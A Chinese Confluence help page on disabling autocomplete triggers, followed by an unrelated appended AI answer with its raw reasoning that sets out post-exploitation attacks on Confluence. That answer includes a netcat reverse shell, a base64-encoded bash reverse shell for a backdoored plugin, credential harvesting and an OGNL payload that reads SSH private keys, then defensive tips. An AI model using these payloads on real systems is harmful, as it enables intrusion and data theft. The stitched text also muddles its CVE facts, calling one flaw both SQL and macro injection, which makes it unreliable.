Confluence 启用和禁用自动完成

本文介绍如何在Confluence中禁用特定字符的自动完成功能,包括禁用与重新启用的方法,以及此设置对不同用户的适用情况。
你可以关闭字符 '[' 和 '!' 的自动完成触发。这样当你输入上面的 2 个触发字符的时候,自动完成功能也不会被启用,当然你也可以将这个功能再次启用。

注意:

这个设置对使用键盘的自动完成无效(Ctrl+Shift+K and Ctrl+Shift+M),尽管编辑器中的特殊字符自动完成触发被禁用了,你还是可以使用键盘的自动完成快捷键的。

这个设置只对你自己有效,其他使用 Confluence 的用户可以通过调整他们的用户属性来确定自己的自动完成功能是不是启用。

自动完成功能在系统安装后是默认启用。

启用和禁用特殊字符的自动完成功能方法如下:

在顶部右侧的屏幕中选择你的属性头像,然后选择设置。

在左侧面板上 你的设置(Your Settings)下你可以看到 编辑(Editor )标签。

选择 编辑(Editor ).

你可以进行下面的 2 个操作:

禁用自动完成 - 通过选择  禁用自动完成(Disable Autocomplete)。

启用自动完成 - 通过不选择 禁用自动完成(Disable Autocomplete)。

选择 提交(Submit)。

屏幕截图:用户设置编辑框



来源: http://cwiki.ossez.com/pages/viewpage.action?pageId=2393207
<think>嗯,用户要求了解Confluence系统的后渗透测试方法安全攻击分析。用户可能是安全工程师或渗透测试人员,需要深入的技术细节来评估Confluence系统的安全性。 从引用内容看,用户关注的是企业级应用的安全测试,特别是后渗透阶段的技术。Confluence作为Atlassian的核心协作工具,一旦被攻破可能造成企业知识库泄露,危害极大。 需要覆盖几个关键层面: 首先是权限维持技术,比如在Confluence中植入恶意宏或插件,利用其定时任务功能实现持久化。这里要强调OAuth令牌的利用,因为Confluence常集成其他Atlassian产品。 数据窃取方面要具体说明API利用方式,比如通过REST API批量导出空间数据,或者利用Velocity模板注入执行系统命令。这些在CVE-2022-26134等漏洞中都有实际案例。 横向移动要结合Atlassian生态,比如通过Confluence服务器作为跳板访问Jira数据库。这里需要提醒MySQL凭据的获取方式,以及解密算法。 最后防御建议必须实用,比如禁用宏功能的操作路径,以及正则表达式过滤的示例。云环境下的责任共担模型也要明确区分用户厂商的安全边界。 用户可能还关心如何检测这些攻击,所以补充了EDR审计日志的关键监控点。这些内容都力求符合用户"后渗透测试"的核心需求,避免泛泛而谈安全理论。 相关问题的设计也延续了深度技术路线,特别是漏洞利用权限模型分析,这应该是专业人员最关注的后续方向。</think>以下是Confluence后渗透测试方法及安全攻击分析的专业指南,涵盖攻击路径、技术手段及防御措施: --- ### 一、后渗透测试核心路径 1. **权限维持技术** - **恶意宏注入**:在Confluence页面插入包含恶意代码的宏(如`{python}import os;os.system("nc -e /bin/sh 攻击者IP 端口")`),利用模板渲染执行命令[^1] - **插件后门**:篡改合法插件(如`draw.io`)的JAR包,添加反向Shell代码(Java示例): ```java Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"); ``` - **定时任务持久化**:通过Confluence的**定时任务管理**功能创建恶意计划任务(需Admin权限) 2. **数据窃取技术** - **数据库凭据提取**: ```bash grep -r "jdbc:" /var/atlassian/application-data/confluence/ # 查找配置文件中的数据库密码 ``` - **空间数据批量导出**:利用REST API自动化导出所有空间(需认证): ```http GET /rest/api/space?limit=1000 GET /rest/api/content?spaceKey=KEY&expand=body.storage ``` - **附件窃取**:通过SQL注入直接访问数据库(CVE-2019-3396漏洞): ```sql SELECT * FROM CONTENT WHERE CONTENTTYPE='ATTACHMENT'; ``` 3. **横向移动技术** - **SSH密钥窃取**:通过Velocity模板注入(CVE-2022-26134)获取服务器权限: ```http POST /pages/doenterpagevariables.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded queryString=eval(@java.lang.Runtime@getRuntime().exec("cat ~/.ssh/id_rsa")) ``` - **Jira横向渗透**:利用Confluence与Jira的集成凭证(`confluence.cfg.xml`中的`hibernate.connection.password`解密) --- ### 二、关键漏洞利用案例 | 漏洞编号 | 影响版本 | 利用方式 | 风险等级 | |------------|------------------|------------------------------|----------| | CVE-2023-22515 | < 8.6.0 | 未授权创建管理员账户 | 严重 | | CVE-2022-26134 | < 7.4.17 | OGNL注入远程代码执行 | 严重 | | CVE-2021-26084 | < 7.12.5 | 模板注入导致命令执行 | 高危 | | CVE-2019-3396 | < 6.15.2 | Widget Connector宏代码执行 | 高危 | --- ### 三、防御加固方案 1. **权限控制** - 启用**强制双因素认证**(2FA) - 遵循最小权限原则,禁用匿名访问 ```xml <!-- 在confluence-init.properties中设置 --> confluence.access.mode=private ``` 2. **安全配置** - 禁用高风险宏(Snippet Macro、Widget Connector) - 配置**Web应用防火墙**(WAF)规则拦截OGNL表达式: ``` \${\w+\(.*\)}|\#\{\w+\(.*\)} ``` 3. **监控检测** - 审计日志重点关注: - 异常Velocity模板渲染(`*.vm`文件修改) - 非常规时间的管理员登录 - 附件目录的异常文件写入(`.jsp`, `.war`) - 部署EDR工具监控`java`进程的子进程创建行为 --- ### 四、云环境特别防护 对于Atlassian Cloud实例(如confluence.atlassian.net): 1. 启用**IP白名单**功能限制访问源 2. 配置**数据驻留**策略满足合规要求 3. 定期审查**已授权OAuth应用**权限范围 > **攻防本质**:后渗透的核心在于**权限维持与数据流转控制**。Confluence作为企业知识中枢,攻击者往往以其为跳板实施供应链攻击[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值